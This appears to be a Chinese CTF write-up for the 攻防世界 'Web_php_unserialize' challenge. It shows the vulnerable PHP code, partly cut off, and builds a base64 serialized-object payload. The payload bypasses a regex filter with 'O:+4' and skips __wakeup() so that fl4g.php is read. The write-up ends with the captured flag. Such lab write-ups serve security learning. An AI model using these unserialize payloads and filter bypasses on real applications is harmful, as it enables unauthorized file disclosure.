攻防世界-web-Web_php_unserialize

攻防世界-web-Web_php_unserialize_第1张图片

获取环境

攻防世界-web-Web_php_unserialize_第2张图片 

file = $file; 
    }
    function __destruct() { 
        echo @highlight_file($this->file, true); 
    }
    function __wakeup() { 
        if ($this->file != 'index.php') { 
            //the secret is in the fl4g.php
            $this->file = 'index.php'; 
        } 
    } 
}
if (isset($_GET['var'])) { 
    $var = base64_decode($_GET['var']); 
    if (preg_match('/[oc]:\d+:/i', $var)) { 
        die('stop hacking!'); 
    } else {
        @unserialize($var); 
    } 
} else { 
    highlight_file("index.php"); 
} 
?>

 很明显,看题目就是和php序列化有关的

get请求接受一个var值,base64编码解码,而且对’/[oc]:\d+:/i’进行过滤,然后反序列化,到__weakup()函数,并且提示flag就在fl4g.php里面,所以构造payload

/var?参数

 

攻防世界-web-Web_php_unserialize_第3张图片 

 构造一下payload

O:4:"Demo":1:{s:10:"Demofile";s:8:"fl4g.php";}
Tzo0OiJEZW1vIjoxOntzOjEwOiJEZW1vZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==

上面为测试,显示空白页面,base64后显示stop hacking
 

 

 ’/[oc]:\d+:/i’并未绕过,看了其他wp,发现只需要在类之前加上+即可

O:+4:"Demo"

后面的数字自然更改

O:4:"Demo":2:

 综合payload就是

O:+4:"Demo":2:{s:10:"Demofile";s:8:"fl4g.php";}
TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==

 

获取flag 

 ctf{b17bd4c7-34c9-4526-8fa8-a0794a197013}

你可能感兴趣的:(攻防世界web,ctf,前端,servlet,php,安全)